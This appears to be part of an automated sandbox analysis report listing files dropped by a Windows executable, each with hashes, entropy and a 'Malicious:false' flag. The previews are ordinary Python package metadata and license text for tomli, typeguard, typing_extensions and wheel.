                                                                                                                                                                                                                              Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                              MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                              SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                              SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                              SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13936
                                                                                                                                                                                                                              Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:cke8RQ6KSAdxC9ad9iqsibQtKti9zpQpzu9Jkh:K8RQ6q7C9ad9iqT8cti9zpQpzu7kh
                                                                                                                                                                                                                              MD5:FCF6B249C2641540219A727F35D8D2C2
                                                                                                                                                                                                                              SHA1:C6E195F9AA30CC9B675D1612CA4FB7F74111BD35
                                                                                                                                                                                                                              SHA-256:3B2F81FE21D181C499C59A256C8E1968455D6689D269AA85373BFB6AF41DA3BF
                                                                                                                                                                                                                              SHA-512:70367B908204B5922E5D9D2ACE39437DBAA1EEFDAD1797B50CC6E7DCA168D9B59199353BADDDCAEEE12B49D328FC8132F628952383CFE6803CB4F4BF9B9D6D86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3018
                                                                                                                                                                                                                              Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DtkCMU2ymXbFX1QI/aMktjaVQEBu+FOK+W6i+qXd0qme28mIp9DvvV+Vz+nlh:DtkCD/mxX1QI/aMktjaVBroBBqd0VODD
                                                                                                                                                                                                                              MD5:8303191AC93E4D32457A4A9E3CDAD8E5
                                                                                                                                                                                                                              SHA1:B6ADA54B9516D20B69A5DD5CDED868DA22C5E252
                                                                                                                                                                                                                              SHA-256:05E51021AF1C9D86EB8D6C7E37C4CECE733D5065B91A6D8389C5690ED440F16D
                                                                                                                                                                                                                              SHA-512:F2F5DBE5EA55ED720FA4191180076E9EFFCB9C811C3C7BF1A1201E9D78590B381E125EAF7B8366B28A03383C2958449423548576605E8DCB5CC11C33C9B0E709
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):571
                                                                                                                                                                                                                              Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rCA89x0a/2zDuxv/vjWaxLbSaLjxjxXaefIE12BATqyo/C:mA87n/2zD6vXCulVZf5Cc4C
                                                                                                                                                                                                                              MD5:B884E8832BFB336C2D7F54271F11EE1C
                                                                                                                                                                                                                              SHA1:5A3BAABEE79E0CF32D2E87C9AF0FBB3AAD8CACAD
                                                                                                                                                                                                                              SHA-256:7710002D81971E632AA6A2FC33DC5D74AAF5D7CAAE22040A65D3E31503B05EE9
                                                                                                                                                                                                                              SHA-512:0A5EB3ABED212C474CB5FDDEF47F8E62DAA130128F2BB368A8E1F12E143DAE2F8B2EF4A9B85A883A03C67195829AD637DB7CF7CC4B41535AF6CA5668F8F2BD0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
